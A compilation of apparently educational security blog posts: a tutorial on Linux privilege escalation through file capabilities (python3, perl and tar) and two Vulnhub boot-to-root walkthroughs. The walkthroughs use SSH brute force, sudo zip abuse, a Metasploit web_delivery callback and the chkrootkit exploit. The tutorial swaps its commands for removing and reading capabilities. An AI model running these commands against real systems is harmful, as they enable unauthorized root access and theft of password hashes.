Linux Privilege Escalation using Capabilities

In this article we will discuss about the mechanism of “capability” and Privilege escalation by abusing it. As we know when the system creates a work context for each user where they achieve their tasks with the privileges that are assigned to them. So, to provide some specific functionalities, it is necessary for a non-privileged user to sometimes temporarily acquire a superuser profile to perform a specific task.

This functionality mainly can be achieved by assigning privileges through sudo, or setuid permissions to an executable file which allows the user to adopt the role of file owner.

To accomplish same task in more secure way the system admin uses “capability” which plays an effective role in the security of Linux based operating systems.

Table of Content

Introduction to Capability

·        What is capability?

·        Difference between capability and SUID.

·        Use of capabilities.

·        List of capability

Abusing capability for Privilege Escalations

·        Python3

·        Perl

·        Tar

Introduction to Capability

What is capability in Linux

Before capabilities, we only had the binary system of privileged and non-privileged processes and for the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes that referred as superuser or root and unprivileged processes (who’s effective UID is nonzero).

Capabilities are a per-thread attribute that can be independently enabled and disabled.

Difference between capability and SUID

SUID: SUID stands for set user ID and allow users to execute the file as the file owner. This is defined as giving temporary access to a user to run a program/file with the permissions of the file’s owner rather that the user who runs it. This can easily be detect by the use of “Find” command. To find all files with SUID set in the current directory we can use-perm option which will print files only with permissions set to 4000.

Capability: Security of Linux systems can be improved by using many actions. One of these measures is called Linux capabilities which are maintained by the kernel. In other word we can say that they are a little unintelligible but similar in principle to SUID. Linux’s thread privilege checking is based on capabilities.

Uses of capabilities

Capabilities work by breaking the actions normally reserved for root down in to smaller portions. The use of capabilities is only beginning to drop in to user land applications as most system utilities do not shed their root privileges. Let’s move ahead that how we can use this permission more into our task.

Limited user’s permission: As we know Giving away too many privileges by default will result in unauthorized changes of data, backdoors and circumventing access controls, just to name a few. So to overcome with this situation we can simply use capability to limited user’s permission.

Using a fine-grained set of privileges: Use of capability can be more clearly understand by another example. Suppose a web server normally runs at port 80 and we also know that we need root permissions to start listening on one of the lower ports (<1024 80.="" 80="" a="" able="" all="" be="" binary="" can="" cap_net_bind_service.="" capability="" daemon="" easier="" giving="" in="" instead="" it="" like="" listen="" much="" needs="" o:p="" of="" on="" open="" permissions="" port="" related="" root="" server="" set="" specific="" the="" this="" to="" up="" way.="" we="" web="" with="">

Working with capability

The operation of capabilities can be achieved by in many ways. Some of them are listed as below:

Assigning and removing capability: They are usually set on executable files and are automatically granted to the process when a file with a capability is executed. The file capability sets are stored in an extended attribute named as security.capability. This can be done by the use of attribute CAP_SETCAP capability.

To enable the capability for any file frame command as shown below:

setcap cap_setuid+ep /home/demo/python3

Simillarly one can also remove file capability by as below mentioned command.

getcap -r / 2>/dev/null  

Reading capability: There are many files or program to which capability are predefined so to view that a file has any capability set then you can simply run command as:

setcap -r /home/demo/python3

If you'd like to find out which capabilities are already set on your system, you can search your whole file-system recursively with the following command:

getcap -r / 2>/dev/null

List of Capability

On the basis of functionality, the capability is categorized into total 36 in count. Some of majorly used are shown below.

Abousing Capabilities Privilege Escalations

Python Capabilities

Suppose the system administrator wants to grant superuser permission for any binary program, let's say for python3, which should only be available to a specific user, and admin doesn't want to give SUID or sudo permission. The admin supposed to used capabilities, for the python3 program that should be execute by specific user let’s say for user “demo”. This can be accomplished with following commands on host machine.

which python3

cp /usr/bin/python3 /home/demo/

setcap cap_setuid+ep /home/demo/python3

As result the user demo received the privilege to run python3 program as root, because here admin has upraised the privilege by using cap_setuid+ep which means all privilege is assign to user for that program. But if you will try to find 4000 permission files or programs then it might not be show for /home/dome/python3.

Note: the user home directory should be not accessible for other user because if it is accessed to other non-root user then other users will also proficient to take privilege of capabilities set for user demo.

Exploiting capabilities using python3

Assuming an intruder has compromised the host machine as local user and spawn the least privilege shell and he looked for system capabilities and found empty capability (ep) over suid is given python3 for user demo that means all privilege is assign to user for that program, therefore taking advantage of this permission he can escalated into high privilege from low privilege shell.

getcap -r / 2>/dev/null

pwd

ls -al python3

./python3 -c 'import os; os.setuid(0); os.system("/bin/bash ")'

id

Hence you can observe the local user demo has accessed the root shell as shown in the given image.

Perl Capabilities

We have another example “perl” which is same as above where the admin supposed to used capabilities, for the perl program that should be execute by specific user let’s say for user “demo”. This can be accomplished with following commands on the host machine.

which perl

cp /usr/bin/perl /home/demo/

setcap cap_setuid+ep /home/demo/perl

As result the user demo received the privilege to run python3 program as root, because here admin has upraised the privilege by using cap_setuid+ep which means all privilege is assign to user for that program.

Exploiting capabilities using perl

Repeat above step for exploit perl program to escalate the root privilege:

getcap -r / 2>/dev/null

pwd

ls -al perl

./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

id

Tar Capabilities

We have another example “tar” which is same as above where the admin supposed to used capabilities to extract high privilege file that are restricted for other users, that should be extract by specific user let’s say by user “demo”.

Let’s take an example: The admin wants to assign a role, where the user “demo” can take the backup of files as root, for this task the admin has set read capability on tar program. This can be accomplished with following commands on the host machine.

which tar

cp /bin/tar /home/demo/

setcap cap_dac_read_search+ep /home/demo/tar

Exploiting capabilities using tar

Repeat same procedure to escalate the privilege, take the access of host machine as local user and move ahead for privilege escalation. Since this time admin has use CAP_DAC_READ_SEARCH that will help us to bypass file read permission checks and directory read and execute permission checks.

getcap -r / 2>/dev/null

pwd

ls -al tar

In this we try to read shadow file where all system’s user password hashes are stored for this you have follow below steps.

·        Compress the /etc/shadow in current directory with the help of tar program.

·        You will get shadow.tar in your current directory.

·        Extract the shadow.tar and you will get a directory as “etc/shadow”.

·        Use cat/head/tail or program to read the hashes of passwords.

./tar cvf shadow.tar /etc/shadow

ls

./tar -xvf shadow.tar

As result you will have “etc/shadow” file your current directory and you can read the hashes of password as shown here.

tail -8 etc/shadow

A malicious user can break this password using tool such john the ripper or hash killer etc.

Conclusion:  The system admin should be aware of security loopholes during assigning such capability which can effect the integrity of kernel that can led to privilege escalation.

HA: Dhanush Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA Dhanush”. We have developed this lab for the purpose of online penetration practices. It is based on the weapon that was part of all the wars in the medieval times. The Bow and Arrow. As the lab is titled Dhanush. Some information about the Indian Mythology and Bows might help. Let’s Solve it!!

Download Here

Level: Intermediate

Task: To Enumerate the Target Machine and Get the Root Access.

Penetration Methodologies

·         Network Scanning

o   Netdiscover

o   Nmap Scan

·         Enumeration

o   Browsing HTTP Service

o   Creating Dictionary from the Webpage

·         Exploitation

o   Bruteforce the SSH

o   Generating SSH Public key for another user

o   Logging in as another user

·         Privilege Escalation

o       Identify Sudo Rights to zip command

o       Abusing Sudo Rights

·         Reading Root Flag

Walkthrough

Network Scanning

After downloading, run the Machine in VMWare Workstation. To work on the machine, we will be needing its IP Address. For this, we will be using the netdiscover command. After matching the MAC and IP Address we found the Virtual Machine IP Address to be 192.168.1.101.

netdiscover

Now that we have the Target Machine IP Address, our next logical step would be to do a port scan on the target to get information about the various services that are running on the target machine. We usually do just the Aggressive Scan, but in this case, we are going for all port scan. By default, Nmap scans the most common 1,000 ports for each protocol. So, we can specify -p- to scan ports from 1 through 65535. This is done as it is safe practice to change the port of a service to an uncommon port. After the scan of all the ports, we see that we have the HTTP service (80), SSH service (65345) running on the Target Machine.

nmap -p- -A 192.168.1.101

Enumeration

Moving on, we observed that we have the HTTP service running. It is probable that a web page is hosted. So, we decided to take a look through our Web Browser. We did a thorough browsing of the webpage. We went through its source code and images, but there was no way in or any hint.

Now, before moving further, we thought as this webpage contains tons of information over the Dhanushs. Also, these can be probably usernames or passwords. So, we decided to make a dictionary using the cewl command.

cewl http://192.168.1.101/ -w dict.txt

cat dict.txt

Exploitation

We decide to start our attempt to exploit this target machine from the port which the author has gone lengths to protect from the naked eye. The port number 65345 with the SSH service. As we have no usernames or the passwords so we decide to bruteforce this ssh login using the dictionary that we just created. We will be using the hydra for the login bruteforce. We are in luck; we got the login credentials for the SSH.

Username: pinak

Password: Gandiv

hydra -L user.txt -P dict.txt 192.168.1.101 ssh -s 65345 -e nsr

Now that we have the login credentials for the SSH, we decided to login and take a look. We ran the sudo -l command to check the sudoers list and found that cp command which works runs as sarang user without any password, hence it can be used. So, we decided to take a look at the user sarang. In the home directory of sarang we see a hidden directory labelled “.ssh”. We tried to open it but it was restricted.

ssh pinak@192.168.101 -p 65345

sudo -l

cd /home/sarang

ls -la

cd .ssh

We decided to use the cp command to get inside the sarang user. To do this we will be needing the ssh keys to be present in the .ssh directory inside the sarang user home directory. Now although the file is restricted to read but we can use the cp command to send the keys inside that directory. To do this first we need to generate those keys. We will be using the ssh-keygen for that particular purpose. After working with ssh-keygen, we move into the .ssh directory inside the pinak user home directory to find the id_rsa public key. We gave it proper permissions. And moved it to the pinak user home directory as shown in the image given.

ssh-kegen

cd .ssh

ls

chmod 777 id_rsa.pub

cp id_rsa.pub /home/pinak

Now that we have transferred the public key, its time use the cp command as user sarang to copy the public key inside the .ssh directory in sarang user home directory. We need to use sudo alongwith the cp command and provide the source directory and destination directory. After doing this, all we need it to login as sarang with the key that we just transferred. We can see that it works nicely. After the successful login as the user sarang, we ran the sudo -l command again as this user is not root and out target is to get root. We see that the zip command has the sudo right that can be abused to escalate privilege on this machine.

sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys

ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345

sudo -l

Privilege Escalation

We use recently logged in through ssh as user sarang. Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run zip commands as root without the need to enter any password.

So, now in the process of escalating the privileges from “sarang” to “root”. At first, we create a file ‘raj’ than we perform three different tasks in a single line of code: first, we zip the file ‘raj’ second move it to /home/raj.zip folder and lastly unzip it which will pop the root shell.

touch raj

pwd

sudo zip /tmp/raj.zip /home/sarang/raj -T --unzip-command="sh -c /bin/bash"

cd /root

ls

cat flag.txt

Finally, we get ‘flag.txt’ inside the root directory. Hence, we accomplished our mission to get the root shell on this Boot2Root Machine.

HA: Chanakya Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA Chanakya”. We have developed this lab for the purpose of online penetration practices. It is based on the Mastermind that took down kingdoms, one and only Chanakya. Let’s Solve it!!

Download Here

Level: Intermediate

Task: To Enumerate the Target Machine and Get the Root Access.

Penetration Methodologies

·         Network Scanning

o   Netdiscover

o   Nmap Scan

·         Enumeration

o   Browsing HTTP Service

o   Getting FTP Login Credentials

o   FTP Login

·         Exploitation

o   Creating Authorized keys to login via SSH

o   Transferring keys through FTP

o   Logging via SSH

o   Reading Chkrootkit logs

o   Getting a reverse connection

o   Spawning a TTY Shell

·         Privilege Escalation

o   Chkrootkit

Walkthrough

Network Scanning

After downloading, run the Machine in VMWare Workstation. To work on the machine, we will be needing its IP Address. For this, we will be using the netdiscover command. After matching the MAC and IP Address we found the Virtual Machine IP Address to be 192.168.1.101.

netdiscover

Now that we have the Target Machine IP Address, our next logical step would be to do a port scan on the target to get information about the various services that are running on the target machine. After the Aggressive Scan of all the ports, we see that we have the SSH service (22), HTTP service (80), FTP service (21) running on the Target Machine.

nmap -A 192.168.1.101

Enumeration

Moving on, we observed that we have the HTTP service running. It is probable that a web page is hosted. So, we decided to take a look through our Web Browser. We did a thorough browsing of the webpage. We went through its source code and images, but there was no way in or any hint.

http://192.168.1.101

Till now we didn’t find any hint to establish our foothold, therefore we chose DIRB for directory brute force attack and Luckily found abuse.txt. After finding the abuse.txt, we decided to download this file to our attacker system for a close inspection. We used the wget command to download this file. Upon opening the file, we see that it contains some text that doesn’t make much sense. It must be encrypted.

dirb http://192.168.1.101/ -X .txt

abuse.txt

wget http://192.168.1.101/abuse.txt

cat abuse.txt

nfubxn.cpncat

After searching on the Internet for a while we found that ROT13 resembles to the text we found. So, we decided to decode the text using the ROT13 Decrypter found here.  When we decrypted the encoded text to be the name of a packet capture file. Let’s find this file.

ashoka.pcapng

We decide to run the wget command directly on the IP Address in a hope that the packet capture file would be in the /var/www/html/ directory. Our suspicion was correct, the file was swiftly downloaded in our attacker machine. After downloading to inspect the file, we decided to inspect the file using Wireshark.

wget http://192.168.1.101/ashoka.pcapng

wireshark ashoka.pcapng

Opened the captured file in Wireshark, followed the tcp stream of ftp traffic and got one username ashoka and password kautilya.

User: ashoka

Pass: kautilya

Now that we have the FTP login credentials, we logged into the FTP Server. After logging in we ran the ls command to look around. We found ourselves in the root directory. So, we decided to make our way through ssh with placing the keys at this location. For that we created a directory named “.ssh”. After traversing in this newly created directory we went back to our native terminal.

ftp 192.168.1.101

ashoka

kautilya

ls -la

mkdir .ssh

cd .ssh

Exploitation

Now time to generate some ssh keys. We used the ssh-keygen to create some keys. We entered the password as “123”. This can be anything of your choice. We kept it so that its easy to remember. Moving on after the key is created, we moved into the .shh directory on out native shell. Here we saw that we have the key named “id_rsa.pub”. Now we need to upload this key to FTP so we copied the contents of the is_rsa.pub in the file named authorized_keys.

ssh-keygen

cd .ssh

ls

cat id_rsa.pub > authorized_keys

ls

We moved the authorized_keys to the home directory so that it is easier to transfer the file using the File Transfer Protocol. Now using the put command we transferred the file to the target machine.

put authorized_keys

ls

Now we will be connecting to the target machine using the ssh. It will be possible to login now due to the authorized keys we placed earlier. We got a shell of the Ashoka user. After some enumeration, we see that we have a logs file inside the temp file. We tried to take a look at it using the cat command.  It definitely looks like a Chkrootkit test results log. This is clue that we might be able to escalate privileges on this machine using Chkrootkit.

ssh ashoka@192.168.1.101

ls /tmp

cat /tmp/logs

Privilege Escalation
Now to Escalate Privileges on the target machine, we are going to need a meterpreter on the target machine which we are going to use get root with the help of the Metasploit. To do this we decided to take a meterpreter using the web_delivery exploit. First, we selected the web_delivery exploit with the help of use command followed by providing the lhost. Lhost is the IP Address of our target machine (Kali Linux). At the end we will type in exploit. This will create a one line script for us that will give us a meterpreter over the target machine.

use exploit/multi/script/web_delivery

set lhost 192.168.1.107

exploit

We copied the said command generated by the exploit and ran over the ssh session we got earlier.

This gave us the session we required to work. We are going to use the inbuilt exploit in the Metasploit that could help us get root shell over the target machine. We selected the session and provide the port for another session. After typing in exploit we see that the exploit is working and it gave us another shell over the port mentioned earlier.

use exploit/unix/local/chkrootkit

set session 1

set lport 8888

exploit

To convert the shell into a proper working shell, we ran the python one liner to spawn a TTY shell. We looked around and found a text file name final.txt, we opened it to find the final flag. We did it. This concludes this lab.

python -c 'import pty;pty.spawn("/bin/bash")'

ls

cat final.txt